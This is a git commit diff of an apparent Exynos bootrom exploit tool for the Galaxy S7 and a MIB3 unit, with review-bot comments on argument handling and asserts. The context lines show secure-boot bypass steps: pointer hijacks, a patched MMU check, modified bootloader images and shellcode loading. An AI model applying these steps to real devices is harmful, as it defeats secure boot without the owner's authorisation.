patching introduced bugs
This commit is contained in:
parent
e98ceea1d6
commit
1dec7120f1
2
source/exploit/.vscode/launch.json
vendored
2
source/exploit/.vscode/launch.json
vendored
@ -37,7 +37,7 @@
|
|||||||
"program": "exploit.py",
|
"program": "exploit.py",
|
||||||
"console": "integratedTerminal",
|
"console": "integratedTerminal",
|
||||||
"justMyCode": false,
|
"justMyCode": false,
|
||||||
"args": ["--debugger-boot", "--MIB3"], //, "--MIB3"
|
"args": ["--debugger-boot", "--target", "MIB3"], //, "--MIB3"
|
||||||
},
|
},
|
||||||
{
|
{
|
||||||
"name": "Debug current file",
|
"name": "Debug current file",
|
||||||
|
@ -98,7 +98,7 @@ class S7Exploit(ExynosDevice):
|
|||||||
bl31 = open("../S7/g930f_latest/g930f_sboot.bin.2.bin", "rb").read()
|
bl31 = open("../S7/g930f_latest/g930f_sboot.bin.2.bin", "rb").read()
|
||||||
bl2 = open("../S7/g930f_latest/g930f_sboot.bin.3.bin", "rb").read()
|
bl2 = open("../S7/g930f_latest/g930f_sboot.bin.3.bin", "rb").read()
|
||||||
bl33 = open("../S7/g930f_latest/g930f_sboot.bin.4.bin", "rb").read()
|
bl33 = open("../S7/g930f_latest/g930f_sboot.bin.4.bin", "rb").read()
|
||||||
if args.MIB3:
|
if args.target == "MIB3":
|
||||||
bl1 = open("../mib3/boot_partitions/fwbl1_a.bin", "rb").read()
|
bl1 = open("../mib3/boot_partitions/fwbl1_a.bin", "rb").read()
|
||||||
bl31 = open("../mib3/boot_partitions/el3_mon_a.bin", "rb").read()
|
bl31 = open("../mib3/boot_partitions/el3_mon_a.bin", "rb").read()
|
||||||
bl2 = open("../mib3/boot_partitions/bl2_a.bin", "rb").read()
|
bl2 = open("../mib3/boot_partitions/bl2_a.bin", "rb").read()
|
||||||
@ -577,7 +577,7 @@ class S7Exploit(ExynosDevice):
|
|||||||
bl31 = open("../S7/g930f_latest/g930f_sboot.bin.2.bin", "rb").read()
|
bl31 = open("../S7/g930f_latest/g930f_sboot.bin.2.bin", "rb").read()
|
||||||
bl2 = open("../S7/g930f_latest/g930f_sboot.bin.3.bin", "rb").read()
|
bl2 = open("../S7/g930f_latest/g930f_sboot.bin.3.bin", "rb").read()
|
||||||
bl33 = open("../S7/g930f_latest/g930f_sboot.bin.4.bin", "rb").read()
|
bl33 = open("../S7/g930f_latest/g930f_sboot.bin.4.bin", "rb").read()
|
||||||
if args.MIB3:
|
if args.target == "MIB3":
|
||||||
bl1 = open("../mib3/boot_partitions/fwbl1_a.bin", "rb").read()
|
bl1 = open("../mib3/boot_partitions/fwbl1_a.bin", "rb").read()
|
||||||
bl1 = open("../mib3/modified_boot/fwbl1_mod.bin", "rb").read()
|
bl1 = open("../mib3/modified_boot/fwbl1_mod.bin", "rb").read()
|
||||||
bl31 = open("../mib3/boot_partitions/el3_mon_a.bin", "rb").read()
|
bl31 = open("../mib3/boot_partitions/el3_mon_a.bin", "rb").read()
|
||||||
@ -627,7 +627,7 @@ class S7Exploit(ExynosDevice):
|
|||||||
self.cd.memwrite_region(0x020200dc, p32(DEBUGGER_ADDR)) # hijack ROM_DOWNLOAD_USB for BL31
|
self.cd.memwrite_region(0x020200dc, p32(DEBUGGER_ADDR)) # hijack ROM_DOWNLOAD_USB for BL31
|
||||||
|
|
||||||
BL1_POINTER = 0x02021880
|
BL1_POINTER = 0x02021880
|
||||||
if args.MIB3:
|
if args.target == "MIB3":
|
||||||
BL1_POINTER = 0x02021890
|
BL1_POINTER = 0x02021890
|
||||||
|
|
||||||
self.cd.memwrite_region(BL1_POINTER, self.cd.arch_dbg.sc.branch_absolute(DEBUGGER_ADDR, branch_ins="br"))
|
self.cd.memwrite_region(BL1_POINTER, self.cd.arch_dbg.sc.branch_absolute(DEBUGGER_ADDR, branch_ins="br"))
|
||||||
@ -680,7 +680,7 @@ class S7Exploit(ExynosDevice):
|
|||||||
|
|
||||||
# Modifies/disables setting up MMU (but is set up eventually) -> MMU says 0x0 instead of 0x1, but still little access (and proper USB recovyer boot!?)
|
# Modifies/disables setting up MMU (but is set up eventually) -> MMU says 0x0 instead of 0x1, but still little access (and proper USB recovyer boot!?)
|
||||||
MMU_CHECK = 0x0202a314
|
MMU_CHECK = 0x0202a314
|
||||||
if not args.MIB3:
|
if not args.target == "MIB3":
|
||||||
MMU_CHECK = 0x020244e8
|
MMU_CHECK = 0x020244e8
|
||||||
self.cd.memwrite_region(MMU_CHECK, struct.pack('>I', 0x1f0c00f1)) # Change check to always be false
|
self.cd.memwrite_region(MMU_CHECK, struct.pack('>I', 0x1f0c00f1)) # Change check to always be false
|
||||||
|
|
||||||
@ -689,7 +689,7 @@ class S7Exploit(ExynosDevice):
|
|||||||
|
|
||||||
# Jump into BL31 and execute it
|
# Jump into BL31 and execute it
|
||||||
BL31_POINTER = 0x02024010
|
BL31_POINTER = 0x02024010
|
||||||
if args.MIB3:
|
if args.target == "MIB3":
|
||||||
BL31_POINTER = 0x0202a010
|
BL31_POINTER = 0x0202a010
|
||||||
self.cd.restore_stack_and_jump(BL31_POINTER) #BL31_RA_PTR
|
self.cd.restore_stack_and_jump(BL31_POINTER) #BL31_RA_PTR
|
||||||
else:
|
else:
|
||||||
@ -708,10 +708,10 @@ class S7Exploit(ExynosDevice):
|
|||||||
|
|
||||||
self.test_write_execute(0x11207010)
|
self.test_write_execute(0x11207010)
|
||||||
|
|
||||||
#if args.MIB3:
|
#if args.target == "MIB3":
|
||||||
# self.cd.arch_dbg.state.LR = DEBUGGER_ADDR
|
# self.cd.arch_dbg.state.LR = DEBUGGER_ADDR
|
||||||
|
|
||||||
if args.MIB3:
|
if args.target == "MIB3":
|
||||||
self.cd.memwrite_region(0x020553e4, b"\x1f\x50\x00\x71")
|
self.cd.memwrite_region(0x020553e4, b"\x1f\x50\x00\x71")
|
||||||
self.cd.memwrite_region(0x020553f8, b"\x1f\x50\x00\x71")
|
self.cd.memwrite_region(0x020553f8, b"\x1f\x50\x00\x71")
|
||||||
|
|
||||||
@ -747,7 +747,7 @@ class S7Exploit(ExynosDevice):
|
|||||||
self.usb_read(0x200)
|
self.usb_read(0x200)
|
||||||
|
|
||||||
# Change bootmode on S7 to SDCARD (allow normal booting, if pressing volume up)
|
# Change bootmode on S7 to SDCARD (allow normal booting, if pressing volume up)
|
||||||
if not args.MIB3:
|
if not args.target == "MIB3":
|
||||||
self.cd.memwrite_region(0x8f01dbdc, struct.pack('>I', 0x03030035))
|
self.cd.memwrite_region(0x8f01dbdc, struct.pack('>I', 0x03030035))
|
||||||
self.cd.memwrite_region(0x8f01dbe0, struct.pack('>I', 0x80f9ff34))
|
self.cd.memwrite_region(0x8f01dbe0, struct.pack('>I', 0x80f9ff34))
|
||||||
|
|
||||||
@ -758,7 +758,7 @@ class S7Exploit(ExynosDevice):
|
|||||||
|
|
||||||
# Jump into a different function that continues the boot flow (different than BL33_LR)
|
# Jump into a different function that continues the boot flow (different than BL33_LR)
|
||||||
BL33_AUTH = 0x02024e5c
|
BL33_AUTH = 0x02024e5c
|
||||||
if args.MIB3:
|
if args.target == "MIB3":
|
||||||
self.cd.memwrite_region(0xcf08aa59, b"\x4c\x44\x46\x58") #58 was 57 in INIT print
|
self.cd.memwrite_region(0xcf08aa59, b"\x4c\x44\x46\x58") #58 was 57 in INIT print
|
||||||
self.cd.memwrite_region(0xcf026b94, struct.pack('>I', 0x210000b4)) # Change bootmode to GPT
|
self.cd.memwrite_region(0xcf026b94, struct.pack('>I', 0x210000b4)) # Change bootmode to GPT
|
||||||
BL33_AUTH = 0x202ae18 # BL33_LR
|
BL33_AUTH = 0x202ae18 # BL33_LR
|
||||||
@ -840,11 +840,14 @@ if __name__ == "__main__":
|
|||||||
arg.add_argument("--unsecure-boot", action="store_true", help="Unsecure boot", default=False)
|
arg.add_argument("--unsecure-boot", action="store_true", help="Unsecure boot", default=False)
|
||||||
arg.add_argument("--debugger-boot", action="store_true", help="Unsecure boot", default=False)
|
arg.add_argument("--debugger-boot", action="store_true", help="Unsecure boot", default=False)
|
||||||
arg.add_argument("--load_ga", action="store_true", help="Load Gupje debugger", default=False)
|
arg.add_argument("--load_ga", action="store_true", help="Load Gupje debugger", default=False)
|
||||||
arg.add_argument("--MIB3", action="store_true", help="Whether boot is on a MIB3", default=False)
|
arg.add_argument("--target", type=str, help="Target device", default="s7", choices=["S7", "MIB3"])
|
||||||
|
|
||||||
args = arg.parse_args()
|
args = arg.parse_args()
|
||||||
exynos = S7Exploit()
|
exynos = S7Exploit()
|
||||||
|
|
||||||
|
# Load json configs from config folder
|
||||||
|
# config = open(f"config/{args.target}.json", "r").read()
|
||||||
|
|
||||||
if args.debug:
|
if args.debug:
|
||||||
shellcode = open("../dwc3_test/dwc3.bin", "rb").read()
|
shellcode = open("../dwc3_test/dwc3.bin", "rb").read()
|
||||||
exynos.exploit(shellcode)
|
exynos.exploit(shellcode)
|
||||||
|
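Review bot: `--target` is declared with `choices=["S7", "MIB3"]` but `default="s7"` (the `arg.add_argument("--target", ...)` line in the last hunk): argparse does not check a default against `choices`, so the unset case silently carries a value no explicit invocation can produce, and the planned `config/{args.target}.json` lookup on the commented-out line would resolve to `config/s7.json` by default but `config/S7.json` when the user passes `--target S7`. Change it to `default="S7"`. The `if not args.target == "MIB3":` guards in the bootmode and MMU hunks read more naturally as `if args.target != "MIB3":`. Separately, in the `@ -577` hunk `bl1` is read from `fwbl1_a.bin` and immediately overwritten from `fwbl1_mod.bin`; this predates the commit, but the dead read should be removed or commented (`# use the patched BL1, not the stock partition`) so a reader knows the modified image is intended. All of these hunks sit inside methods of `S7Exploit` whose bodies extend outside the diff.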
@ -7,6 +7,9 @@ from ghidra_assistant.utils.debugger.debugger_archs.ga_arm64 import GA_arm64_deb
|
|||||||
from qiling.const import QL_ARCH
|
from qiling.const import QL_ARCH
|
||||||
import os, tqdm, datetime
|
import os, tqdm, datetime
|
||||||
|
|
||||||
|
ENDPOINT_BULK_IN = 0x81
|
||||||
|
ENDPOINT_BULK_OUT = 0x2
|
||||||
|
|
||||||
def p32(x):
|
def p32(x):
|
||||||
return struct.pack("<I", x)
|
return struct.pack("<I", x)
|
||||||
|
|
||||||
@ -31,6 +34,7 @@ class ExynosDevice():
|
|||||||
self.target = "8890" # TODO auto detect device
|
self.target = "8890" # TODO auto detect device
|
||||||
self.connect_device()
|
self.connect_device()
|
||||||
|
|
||||||
|
|
||||||
def connect_device(self):
|
def connect_device(self):
|
||||||
"""Setup proper connection, and ensure the connection is alive"""
|
"""Setup proper connection, and ensure the connection is alive"""
|
||||||
self.context = usb1.USBContext()
|
self.context = usb1.USBContext()
|
||||||
@ -58,12 +62,14 @@ class ExynosDevice():
|
|||||||
self.handle.claimInterface(0)
|
self.handle.claimInterface(0)
|
||||||
print(f"Connected device! {hex(self.idVendor)} {hex(self.idProduct)}")
|
print(f"Connected device! {hex(self.idVendor)} {hex(self.idProduct)}")
|
||||||
|
|
||||||
|
|
||||||
def disconnect(self):
|
def disconnect(self):
|
||||||
"""Disconnect the device"""
|
"""Disconnect the device"""
|
||||||
self.handle.releaseInterface(0)
|
self.handle.releaseInterface(0)
|
||||||
self.handle.close()
|
self.handle.close()
|
||||||
self.context.exit()
|
self.context.exit()
|
||||||
|
|
||||||
|
|
||||||
def write(self, data):
|
def write(self, data):
|
||||||
"""Write data to the device"""
|
"""Write data to the device"""
|
||||||
transferred = ctypes.c_int()
|
transferred = ctypes.c_int()
|
||||||
@ -71,6 +77,7 @@ class ExynosDevice():
|
|||||||
assert(res == 0), "Could not perform bulk transfer"
|
assert(res == 0), "Could not perform bulk transfer"
|
||||||
return res
|
return res
|
||||||
|
|
||||||
|
|
||||||
def usb_write(self, data):
|
def usb_write(self, data):
|
||||||
assert len(data) <= 0x200, "Data too big"
|
assert len(data) <= 0x200, "Data too big"
|
||||||
transferred = ctypes.c_int()
|
transferred = ctypes.c_int()
|
||||||
|
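Review bot: `ENDPOINT_BULK_IN` and `ENDPOINT_BULK_OUT` are introduced at module level but nothing in the visible hunks reads them, and `write()`/`usb_write()` are only partially shown, so it is unclear whether the bulk transfer calls still hard-code the endpoint address; if they do, switch them to the constants so the two cannot drift. Either way the values deserve a comment, e.g. `# USB bulk endpoint addresses; bit 7 set (0x81) marks the device-to-host direction`. While here, `assert(res == 0), "Could not perform bulk transfer"` and `assert len(data) <= 0x200, "Data too big"` are stripped under `python -O`, so a failed or over-sized transfer would go unreported — `if res != 0: raise RuntimeError("Could not perform bulk transfer")` is the safer form; both method bodies continue outside the hunk.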